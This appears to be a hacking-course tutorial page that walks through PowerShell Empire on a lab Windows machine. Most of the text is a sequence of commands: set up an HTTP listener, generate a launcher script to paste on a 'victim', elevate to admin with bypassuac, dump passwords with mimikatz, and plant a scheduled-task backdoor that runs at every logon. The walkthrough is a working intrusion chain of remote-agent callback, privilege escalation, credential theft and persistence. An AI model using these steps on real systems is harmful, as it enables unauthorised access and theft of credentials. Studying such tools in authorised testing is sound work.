Powershell
Powershell is the object-oriented replacement for the ancient Windows cmd.exe. It it not present on all installations of Windows, but can be added via a download from Microsoft.
There are five versions of Powershell at the moment (2018). You can start it by typing powershell in the runline or in cmd.
Before going any further, read this presentation:
https://cdn.shopify.com/s/files/1/0177/9886/files/nmittal.pdf
And see this quick description with handy hints:
https://www.darkoperator.com/blog/2013/1/10/powershell-basicsndashthe-environment.html
Empire
Empire lets you run Powershell agents without needing Powershell to be installed on your target.
Here’s a good intro:
https://ethicalhackingblog.com/hacking-powershell-empire-2-0/
You may need to install Empire
git clone https://github.com/EmpireProject/Empire.git cd Empire chmod +x install.sh
Enter a password or let it generate one for you.
$./install.sh
Create a listener
Start Empire:
./empire # list listeners listeners # use the http listener uselistener http execute # now our listener should show up: listeners
Create a PowerShell script and send it to your victim using the launcher
Create a launcher:
launcher
Generate a Powershell script with the listener name http:
launcher powershell http
Copy the resulting Powershell script.
Open a new terminal and start a remote desktop session: (this is noisy, so consider terminal alternatives)
rdesktop -u IEUser -p password 192.168.0.11
In the remote desktop, open a cmd shell and paste in the script. Hit Enter.
Back in the Linux Empire terminal session, see that there is now an agent active.
In this terminal go back to the main window:
back
List available agents:
agents
Note the Name of the agent. It’s random and complex, so rename it:
rename [old name] [new name]
Now to list the active agents enter:
list
Interact with our agent:
interact http
Get info on the agent:
info
High_integrity 0 means we’re not an admin.
Become an admin, amazingly, with a single command, followed by the name of the listener:
bypassuac http
Now type:
[enter] back list
Note the new listener and the user names listed. An asterisk indicates a power user. Rename this new listener too:
rename [old name] [new name]
Now let’s interact with the new agent:
interact [agent name] info
High_integrity 1 now indicates we’re admin!
List all extracted passwords (there aren’t any yet):
creds
Run mimikatz and wait for it to execute. Note that this may crash the LSASS process, making us very conspicuous. See another way to get AD information at https://schoolforhackers.com/penetration-testing-windows-active-directory-extracting-ntds-and-cracking-hashes/.
mimikatz
Once it’s done type:
creds
and see the cracked passwords.
Create a persistent backdoor with the module schtasks:
usemodule persistence/elevated/schtasks # check its options info # set set OnLogon True set Listener http # exploit! execute
Now our backdoor will execute every time the user logs on.